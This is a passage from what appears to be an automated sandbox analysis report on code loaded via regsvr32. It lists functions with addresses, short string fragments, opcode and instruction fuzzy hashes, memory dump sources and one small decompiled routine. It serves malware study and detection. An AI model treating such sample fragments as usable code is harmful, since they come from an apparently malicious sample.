Opcode Fuzzy Hash: d41960ad032d02aa43a06cacd4c3fdf514c501a5b8f19463d910750cf599ef8a
Instruction Fuzzy Hash: F641E5B090074E8BDB48DF64C48A5DE7FB1FB58398F11861DE856A6290D3B4D6A4CFC1

Uniqueness

Uniqueness Score: -1.00%

Function 005DC058 Relevance: 2.6, Strings: 2, Instructions: 97COMMON

Download Yara Rule

Strings

S", xrefs: 005DC1A0
+ , xrefs: 005DC10B

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: + $S"
API String ID: 0-2880694137
Opcode ID: 0a120380ba46ade300821e018fa54fd0c93605979f7eaf18b3fcea56eb471111
Instruction ID: abbad0e59d1887564a518e39ec72bffeb1be104300af016f2e78f5c0c76ba0a2
Opcode Fuzzy Hash: 0a120380ba46ade300821e018fa54fd0c93605979f7eaf18b3fcea56eb471111
Instruction Fuzzy Hash: 9951B6B090078E8FDF88DF64C88A5DE7BB0FB58358F10461DE866A6250D3B8D665CF85

Uniqueness

Uniqueness Score: -1.00%

Function 005DB130 Relevance: 2.6, Strings: 2, Instructions: 97COMMON

Download Yara Rule

Strings

=K, xrefs: 005DB23E
d%, xrefs: 005DB189

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: =K$d%
API String ID: 0-2790768846
Opcode ID: 046eeb3a7e312ef4597a0ceadb2c0b4017743bcb75cc6b1a2b492f4bea5b2233
Instruction ID: 0da0fd42309bbb1c4afa2e1a2fc020b93ff91b58509b05e0b2fd6c0ec3dc1062
Opcode Fuzzy Hash: 046eeb3a7e312ef4597a0ceadb2c0b4017743bcb75cc6b1a2b492f4bea5b2233
Instruction Fuzzy Hash: 0F41D3B090074E8BDF48CF64C88A5DE7BF0FB58358F104A1DE86AA6254D3B89665CF85

Uniqueness

Uniqueness Score: -1.00%

Function 005C95BC Relevance: 2.6, Strings: 2, Instructions: 93COMMON

Download Yara Rule

Strings

#|, xrefs: 005C966C
`, xrefs: 005C96B4

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #|$`
API String ID: 0-1687004633
Opcode ID: 1dbd93d6a4af5ab501e4fd27d4ca136d79918f9d458c9bd4a0bbcc41cb67c6cc
Instruction ID: 3dee30a25be210c78f0b771500d030b5212d674a0e43e797b7f193d0ab75f478
Opcode Fuzzy Hash: 1dbd93d6a4af5ab501e4fd27d4ca136d79918f9d458c9bd4a0bbcc41cb67c6cc
Instruction Fuzzy Hash: 1F41C4B190078E8FDF88CF68C88A4DE7BF0FB58358F014619F856A6250D3B89665CF85

Uniqueness

Uniqueness Score: -1.00%

Function 005DC44C Relevance: 2.6, Strings: 2, Instructions: 87COMMON

Download Yara Rule

Strings

j~;, xrefs: 005DC5B3
c, xrefs: 005DC581

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: c$j~;
API String ID: 0-3832213246
Opcode ID: 18b6bb2236c3d81442985b19945feacbaaab319f380d4d3d69fe49ad0df2425e
Instruction ID: 57a58da8669a1c7248cac927f9234a44434be2dd62e84cc1c723348e5751a5f0
Opcode Fuzzy Hash: 18b6bb2236c3d81442985b19945feacbaaab319f380d4d3d69fe49ad0df2425e
Instruction Fuzzy Hash: 0641A5B080078E8FDB88DF64C88A5DF7BB0FB54358F104A19EC66A6250D3B49661CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 005C7C08 Relevance: 2.6, Strings: 2, Instructions: 82COMMON

Download Yara Rule

Strings

-h, xrefs: 005C7D15
W, xrefs: 005C7C6A

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: -h$W
API String ID: 0-4146498651
Opcode ID: ac1beb8efc805ec182d5897ee57bff0eb204918572bad0795e6a59dbf0da3e57
Instruction ID: 6e3c4d74b719fa91a191bd62f02ba5aabe1e58856141e5258f62b9d270e84587
Opcode Fuzzy Hash: ac1beb8efc805ec182d5897ee57bff0eb204918572bad0795e6a59dbf0da3e57
Instruction Fuzzy Hash: FD41B4B590038E9FDB44CFA8D88A9CE7FF0FB48358F114619F869A6250D3B49664CF85

Uniqueness

Uniqueness Score: -1.00%

Function 005E8A00 Relevance: 2.6, Strings: 2, Instructions: 81COMMON

Download Yara Rule

Strings

., xrefs: 005E8A70
fp, xrefs: 005E8AC9

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: .$fp
API String ID: 0-3298127435
Opcode ID: ddbbea76e87b75a0423c6c5dce58b2b1cb486f12ce18d3dc43adec7097cd1835
Instruction ID: 45a812d32f58b5b168330f17de3fee51fc9b1193cb9920b4edc52bc2716be9fd
Opcode Fuzzy Hash: ddbbea76e87b75a0423c6c5dce58b2b1cb486f12ce18d3dc43adec7097cd1835
Instruction Fuzzy Hash: 7941F5B190470E8FDF48CF64C48A4DE7FB0FB68398F104619E856A6290D3B89665CFC4

Uniqueness

Uniqueness Score: -1.00%

Function 005C8FB0 Relevance: 2.6, Strings: 2, Instructions: 79COMMON

Download Yara Rule

Strings

Zs, xrefs: 005C8FCC
", xrefs: 005C8FC4

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: "$Zs
API String ID: 0-3922668666
Opcode ID: 68d2441b249f9a93f4c72500e977988d29b83f362e05d91f8df6eb9a31c852ba
Instruction ID: f1d62621bd08a38fa15a490595be93b85bae5397fb0987493b8f1264ce03d9fe
Opcode Fuzzy Hash: 68d2441b249f9a93f4c72500e977988d29b83f362e05d91f8df6eb9a31c852ba
Instruction Fuzzy Hash: 803192B0529380ABC388DF28D19A91EBBE1FBD5708F806A1DF8C286390D374D406CB43

Uniqueness

Uniqueness Score: -1.00%

Function 005C7840 Relevance: 2.6, Strings: 2, Instructions: 78COMMON

Download Yara Rule

Strings

s [, xrefs: 005C7898
XW, xrefs: 005C78F9

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: XW$s [
API String ID: 0-2366283936
Opcode ID: 76c1b907ae6b42603d5a16b60f951f87ab574e6943cc66960cdc964ad17b59d9
Instruction ID: c8620a86b0501fca327921337904d07bbca0ac58b79dbc40019122cd377fd21c
Opcode Fuzzy Hash: 76c1b907ae6b42603d5a16b60f951f87ab574e6943cc66960cdc964ad17b59d9
Instruction Fuzzy Hash: 623190B190478E8FDF48DF28D88949A3BE1FB48304B004A1DFC6AD7250D7B4D665CB95

Uniqueness

Uniqueness Score: -1.00%

Function 005C4C84 Relevance: 2.6, Strings: 2, Instructions: 72COMMON

Download Yara Rule

Strings

jn(, xrefs: 005C4D02
4V, xrefs: 005C4D12

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 4V$jn(
API String ID: 0-2529302498
Opcode ID: 4347d8350eb776fef7c9ebb529210ab3cab55532b2ec0dd05afe6f01a2bbb923
Instruction ID: cb5d544f3b4b9f04c9dfd671481ec3bad593690e5eb4dddf862df6e3aa1dae86
Opcode Fuzzy Hash: 4347d8350eb776fef7c9ebb529210ab3cab55532b2ec0dd05afe6f01a2bbb923
Instruction Fuzzy Hash: 17317EB1529381AFC398CF28C48A91ABBE0FBC9318F806A1DF8C686260D774D555CB02

Uniqueness

Uniqueness Score: -1.00%

Function 005CF65C Relevance: 2.6, Strings: 2, Instructions: 69COMMON

Download Yara Rule

Strings

', xrefs: 005CF759
%6, xrefs: 005CF74C

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: '$%6
API String ID: 0-1852427169
Opcode ID: 42a3203eb3ebe9af52f3f94821d08fbcbfa30131473cda762de5c23950ca3f94
Instruction ID: 05249663a0179330ad45d21934dcfd5c9628912d79576b4f5c22a08ed84997fc
Opcode Fuzzy Hash: 42a3203eb3ebe9af52f3f94821d08fbcbfa30131473cda762de5c23950ca3f94
Instruction Fuzzy Hash: CD316FB5568381ABD388DF28C48A81ABBF1FB89308F806A1DF8C6DB251D775D545CB43

Uniqueness

Uniqueness Score: -1.00%

Function 005C8A8C Relevance: 2.6, Strings: 2, Instructions: 68COMMON

Download Yara Rule

Strings

J, xrefs: 005C8AB1
uS, xrefs: 005C8B32

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: uS$J
API String ID: 0-437994327
Opcode ID: a2b51c32bad19ba39d4e427c2f512c2a59b50882f014cb68f936c9e880adca61
Instruction ID: 780587c4235536167daafd67ea35e31938577a17e9202307aac271a0e6235da5
Opcode Fuzzy Hash: a2b51c32bad19ba39d4e427c2f512c2a59b50882f014cb68f936c9e880adca61
Instruction Fuzzy Hash: 5F31C6B190034E8FDB84CF64C88A5DE7FB0FB68358F104619E859A6260D3B88695CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 005D0A70 Relevance: 2.6, Strings: 2, Instructions: 62COMMON

Download Yara Rule

Strings

+@, xrefs: 005D0B69
`.P, xrefs: 005D0B2E

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: +@$`.P
API String ID: 0-1189405855
Opcode ID: a70f442d9e9e175520b0b0d93d41500bfede9fc32031e6ea222cabd22b859c02
Instruction ID: 39de2ea6a026fc69778914cf9e44a5f31bb4615b8119a4e03ad8497b2faa6ad6
Opcode Fuzzy Hash: a70f442d9e9e175520b0b0d93d41500bfede9fc32031e6ea222cabd22b859c02
Instruction Fuzzy Hash: A1316FB15187848FD348DF28C45941BBBE1BB9C758F804B1DF4CAAA260D778D645CF4A

Uniqueness

Uniqueness Score: -1.00%

Function 005C3CF4 Relevance: 2.6, Strings: 2, Instructions: 57COMMON

Download Yara Rule

Strings

R, xrefs: 005C3D10
^, xrefs: 005C3D00

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ^$R
API String ID: 0-3595634639
Opcode ID: b7e08d49ea1b5b1d89cab638ecb6b58cb02da954cd334f399a60917b828591f9
Instruction ID: 7dec6e6ff202478201587024085261afee01554c9ae7569198c8fcb843946a7e
Opcode Fuzzy Hash: b7e08d49ea1b5b1d89cab638ecb6b58cb02da954cd334f399a60917b828591f9
Instruction Fuzzy Hash: 112180B0528781AFC398DF28D49591FBBF1BB88744F806A1DF8C686390D779D505CB46

Uniqueness

Uniqueness Score: -1.00%

Function 005C2FD4 Relevance: 2.6, Strings: 2, Instructions: 56COMMON

Download Yara Rule

Strings

w, xrefs: 005C305F
t^, xrefs: 005C2FEB

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: t^$w
API String ID: 0-1486493484
Opcode ID: d9d2b37262035f156a08dae9f88ea85b7583d03cc1c0d0918aa86d9476248fb5
Instruction ID: 0fcab25796e593e8dfb7fafe86ea51ff53beb953310655f2f877b1f2b437242d
Opcode Fuzzy Hash: d9d2b37262035f156a08dae9f88ea85b7583d03cc1c0d0918aa86d9476248fb5
Instruction Fuzzy Hash: B1219DB090078E8FDB48DF68D8491DE7BB0FB18308F014A59F82996290D3B89665CF85

Uniqueness

Uniqueness Score: -1.00%

Function 005D1924 Relevance: 1.7, Strings: 1, Instructions: 428COMMON

Download Yara Rule

Strings

#, xrefs: 005D1BB3

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #
API String ID: 0-606707520
Opcode ID: 99547394c1cfeee33f3fbc263d3122085f4524b50faca7c5dbf1af4b9be79401
Instruction ID: 294d7d5fc64d307c3062b89f55fa7a8456ac1da2833d998cd0f4cadfefc59424
Opcode Fuzzy Hash: 99547394c1cfeee33f3fbc263d3122085f4524b50faca7c5dbf1af4b9be79401
Instruction Fuzzy Hash: A0222770914709EFDB58DFA8C49A49EBBF1FB44348F00816DE84AAB390D7749A19CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180008D28 Relevance: 1.6, APIs: 1, Instructions: 149
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00000001180008D28(long long __rbx, void* __rcx, void* __rdx, long long __rsi, signed int __r8, void* __r9) {
				signed long long _t25;
				void* _t27;
				void* _t30;

				 *((long long*)(_t30 + 8)) = __rbx;
				 *(_t30 + 0x10) = _t25;
				 *((long long*)(_t30 + 0x18)) = __rsi;
				_t27 = (_t25 | 0xffffffff) + 1;
				if ( *((intOrPtr*)(__rcx + _t27)) != dil) goto 0x80008d56;
				if (_t27 + __rdx -  !__r8 <= 0) goto 0x80008d92;
				return __rdx + 0xb;
			}

0x180008d28
0x180008d2d
0x180008d32
0x180008d56
0x180008d5d
0x180008d70
0x180008d91

Memory Dump Source

Source File: 0000000C.00000002.327848444.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.327841626.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327892228.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327904812.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327910954.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c9a505e11390fee30cde8d58ba8d3236255a76ec469928530f6db279ba29baa
Instruction ID: 1f7af7de608e037a3e69fafdab2b7a4d19b0596ea53e23cf5e8b59c7fdfa90c1
Opcode Fuzzy Hash: 9c9a505e11390fee30cde8d58ba8d3236255a76ec469928530f6db279ba29baa
Instruction Fuzzy Hash: D151C432700B9489FBA1DB72A8447DE7BA1B7587D4F148225FE9827B99DF38C605D700

Uniqueness

Uniqueness Score: -1.00%

Function 005D1030 Relevance: 1.6, Strings: 1, Instructions: 357COMMON

Download Yara Rule

Strings

ef, xrefs: 005D11CE

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ef
API String ID: 0-3522424648
Opcode ID: 63cf04038136136116a979567ba4b26417661d5f843165bc7989bb71bb8234a9
Instruction ID: ae3199528fc968c08c030262650a1af992183e7cbd3b84c06ce8282225c8b85f
Opcode Fuzzy Hash: 63cf04038136136116a979567ba4b26417661d5f843165bc7989bb71bb8234a9
Instruction Fuzzy Hash: 36021870A04709EFDB58DF68C08959EBBF2FB44304F00816EE84AAB364D775DA59CB85

Uniqueness

Uniqueness Score: -1.00%

Function 005CEF14 Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

x]!-, xrefs: 005CF2E3

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: x]!-
API String ID: 0-585868058
Opcode ID: cf2a29744dbdbd02a151a4b044d1109f6beb7998a165a5b3606498e8daacfd79
Instruction ID: 5b6004288335477a14bd3225b63573a210e581df199e33fa1750d14e4e24ef67
Opcode Fuzzy Hash: cf2a29744dbdbd02a151a4b044d1109f6beb7998a165a5b3606498e8daacfd79
Instruction Fuzzy Hash: 26D189B1A0060DCFDBA8CF78C54A5DD7BF1FB48308F606129E826AA2B6D7749905CF54

Uniqueness

Uniqueness Score: -1.00%

Function 005DA8B0 Relevance: 1.4, Strings: 1, Instructions: 195COMMON

Download Yara Rule

Strings

}^O, xrefs: 005DABB5

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: }^O
API String ID: 0-3039680174
Opcode ID: 2737519d22680c9269c125336f90b0d45ca51200b7d26ea2addf6a8d31d5b6e5
Instruction ID: 8dc141908e9c88f7635e094ac77da457f5cea99b4e82dab9b65d70b4f0034ec8
Opcode Fuzzy Hash: 2737519d22680c9269c125336f90b0d45ca51200b7d26ea2addf6a8d31d5b6e5
Instruction Fuzzy Hash: 0AA17BB2502749CFDB98DF28C69A59D3BE1FF55308F004129FC1E9A2A0D3B4E925CB49

Uniqueness

Uniqueness Score: -1.00%

Function 005D4D20 Relevance: 1.4, Strings: 1, Instructions: 142COMMON

Download Yara Rule

Strings

RH, xrefs: 005D4D53

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: RH
API String ID: 0-2975065227
Opcode ID: da44171f9c80a2056ccb259cc2b9eac6e02ade2ac8d9ef905a94791c40a4a894
Instruction ID: 272befa9ff19583c1127a57f5e13ee720ec0cfaaed1b964a64b9bf51d521b187
Opcode Fuzzy Hash: da44171f9c80a2056ccb259cc2b9eac6e02ade2ac8d9ef905a94791c40a4a894
Instruction Fuzzy Hash: 3D512A7111C7449FC7B8DF18D4C66AABBE4FB84310F90891EE8CEC7251DE74A84A8B46

Uniqueness

Uniqueness Score: -1.00%

Function 005CBE90 Relevance: 1.4, Strings: 1, Instructions: 132COMMON

Download Yara Rule

Strings

Y, xrefs: 005CBEF2

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: Y
API String ID: 0-579211002
Opcode ID: c7ef7c05ef0c3c9f2aed6826f015ad160cfcc6abce9b29eb71b79f5d508516d5
Instruction ID: f5e6f7b975547d3b625c1b02fe0179e56a08b1367425e145dbea9811f376d9a2
Opcode Fuzzy Hash: c7ef7c05ef0c3c9f2aed6826f015ad160cfcc6abce9b29eb71b79f5d508516d5
Instruction Fuzzy Hash: B651F4715107898BDB58DF28C88A5DD3BA1FB4831CF02432CFD8EA62A1D778D845CB49

Uniqueness

Uniqueness Score: -1.00%

Function 005CD6CC Relevance: 1.4, Strings: 1, Instructions: 125COMMON

Download Yara Rule

Strings

vOs, xrefs: 005CD8D7

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: vOs
API String ID: 0-1852020951
Opcode ID: 0a3c35978ef4d06ef910e88490b5bce2e9beff051be12035b9eadbcefa2f22bf
Instruction ID: ee19707f9579cf96d766eba66e15c29388cde36b28ebe36e509f7fed859b9f41
Opcode Fuzzy Hash: 0a3c35978ef4d06ef910e88490b5bce2e9beff051be12035b9eadbcefa2f22bf
Instruction Fuzzy Hash: 6F618DB190030E8FDB49CF68D48A5CE7FB0FB64398F204519F845A6260D7B996A8CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 005C461C Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

*), xrefs: 005C4691

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: *)
API String ID: 0-1811957435
Opcode ID: c39f41b8af2b9280dd7c00c4ba0ddd05394017a856c7f82ca50d576e38ac2643
Instruction ID: 8cbdee3f41d33a5464847fc244064804a75540ebee370f9aa5a7f9c32b561c53
Opcode Fuzzy Hash: c39f41b8af2b9280dd7c00c4ba0ddd05394017a856c7f82ca50d576e38ac2643
Instruction Fuzzy Hash: 7031933061CB898FC728DF29D09556ABBE0FB99301F504A2EE58AC7365DB70D805CB82

Uniqueness

Uniqueness Score: -1.00%

Function 005CF77C Relevance: 1.4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

t, xrefs: 005CF7C6

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: t
API String ID: 0-1935021737
Opcode ID: 783391770682b9c9d34a01018b97ccb4612aed757a5715f7015a6466eeb6abdd
Instruction ID: 79f8fe0b717767069449c0f1855b82ea8fdbe9129a91c14c6d462ae6248aa416
Opcode Fuzzy Hash: 783391770682b9c9d34a01018b97ccb4612aed757a5715f7015a6466eeb6abdd
Instruction Fuzzy Hash: E8319E3021CB458FE768DF2CD48956ABBE1FB96340F104A6EE5CAC7266D770D805CB82

Uniqueness

Uniqueness Score: -1.00%

Function 005E181C Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

__, xrefs: 005E18BC

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: __
API String ID: 0-2267946753
Opcode ID: 8f9b035c25ddab069e89f1d5b32d9e06551c62a3022c943f576078da68d92037
Instruction ID: 7c6331ae422fd4004eca3de3f47467fd1fc0a1501504dc0d4fb05d061450e605
Opcode Fuzzy Hash: 8f9b035c25ddab069e89f1d5b32d9e06551c62a3022c943f576078da68d92037
Instruction Fuzzy Hash: 4041F070508B858BE758DF29C18A41ABBF1FBCA344F500A2DF69A87360C775D845CB42

Uniqueness

Uniqueness Score: -1.00%

Function 005C9408 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

GSn, xrefs: 005C9530

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: GSn
API String ID: 0-1733515909
Opcode ID: 120b4183c770ef369911dc760361451600c2e99f203226371e5481c8821bf4d7
Instruction ID: 0f3940e37e67debf575b6c12ea6a9f055bd551c6bdf7efd271757f2baff70033
Opcode Fuzzy Hash: 120b4183c770ef369911dc760361451600c2e99f203226371e5481c8821bf4d7
Instruction Fuzzy Hash: F651D6B090038E8FDF48DF64C84A5DE7BB1FB58358F104A1DEC66A6294D3B89664CF84

Uniqueness

Uniqueness Score: -1.00%

Function 005E8500 Relevance: 1.4, Strings: 1, Instructions: 103COMMON

Download Yara Rule

Strings

8=, xrefs: 005E8591

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 8=
API String ID: 0-237953557
Opcode ID: bb623fe5bad30cc0ccc512b27898bb82e9ca0e52d8794c79c7b053a60b518db3
Instruction ID: 6d8721f8906a44145b6e4134d2fa44f95d70c3ffe53026244ebc1dc29df2fec0
Opcode Fuzzy Hash: bb623fe5bad30cc0ccc512b27898bb82e9ca0e52d8794c79c7b053a60b518db3
Instruction Fuzzy Hash: 9E314B30208B458BDB6CDF2CC49912ABAE1FBD9300F444A2EF58AD7365DB34D845CB82

Uniqueness

Uniqueness Score: -1.00%

Function 005D20E0 Relevance: 1.3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

Strings

K, xrefs: 005D217C

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: K
API String ID: 0-425913083
Opcode ID: 2b1ae9da1385bdbe4b8d4d873491c8ef025a73cbd56fa24a9a5b2ec22b63fa4f
Instruction ID: ddd98ceb22c42b0f952728dfcb47cc0b683bb4b0a21231f461bbec04a26dab1d
Opcode Fuzzy Hash: 2b1ae9da1385bdbe4b8d4d873491c8ef025a73cbd56fa24a9a5b2ec22b63fa4f
Instruction Fuzzy Hash: 5541F7B180438E8FDB48CF68D8865DE7BB0FB58348F114A19E866A6250D3B8D665CF85

Uniqueness

Uniqueness Score: -1.00%

Function 005D08CC Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

t", xrefs: 005D092F

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: t"
API String ID: 0-2131657386
Opcode ID: a3a222a6e056c70518c09b2f7e5539db3b60aaf61629909d00af61b4973bd0e8
Instruction ID: baa8ffa022b2e33773e98fefcf94e0e316c045567a18bdbdb894a760df8f86d7
Opcode Fuzzy Hash: a3a222a6e056c70518c09b2f7e5539db3b60aaf61629909d00af61b4973bd0e8
Instruction Fuzzy Hash: E241C77190070D8BDF48DF64C48A4DE7FB0FB483A8F655219E81AB6290D3B89585CF99

Uniqueness

Uniqueness Score: -1.00%

Function 005D3CD4 Relevance: 1.3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

gLv, xrefs: 005D3D74

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: gLv
API String ID: 0-1669999040
Opcode ID: d372408e4ccfa21733394c795309bb98bbbf8ce06b144d4f85a8e8de8872e02b
Instruction ID: 196f38f6f53ad4ac5c9ed6de46733af06ca8622d822943f67b55e72cfa0f79df
Opcode Fuzzy Hash: d372408e4ccfa21733394c795309bb98bbbf8ce06b144d4f85a8e8de8872e02b
Instruction Fuzzy Hash: 0841A0B190078E8FDF84CF64C88A5DE7BB0FB18358F104619F866A6290D3B89665CF95

Uniqueness

Uniqueness Score: -1.00%

Function 005C18DC Relevance: 1.3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

Strings

2|, xrefs: 005C1938

Memory Dump Source

